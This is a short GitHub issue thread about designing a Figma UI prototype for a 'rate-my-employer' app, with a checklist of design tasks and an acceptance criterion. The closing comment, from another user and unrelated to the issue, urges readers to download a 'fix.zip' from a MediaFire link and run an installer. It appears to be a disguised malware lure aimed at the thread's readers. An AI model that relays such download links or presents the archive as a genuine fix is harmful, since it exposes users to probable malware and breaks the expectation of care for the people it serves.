### ISSUE TITLE
Create a UI prototype of the app

### ISSUE THREAD

**Issue by VriaA** [VriaA/rate-my-employer#1]
### Details

- [x] Design the prototype using Figma.
- [x] Define the color palette and fonts for the application.
- [x] Ensure the design is consistent and user-friendly.
- [x] Design must include the section for submitting links for scraping
- [x] Design must include the section for the advanced search feature

### Acceptance Criteria
- The team must agree on the prototype created in Figma.

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
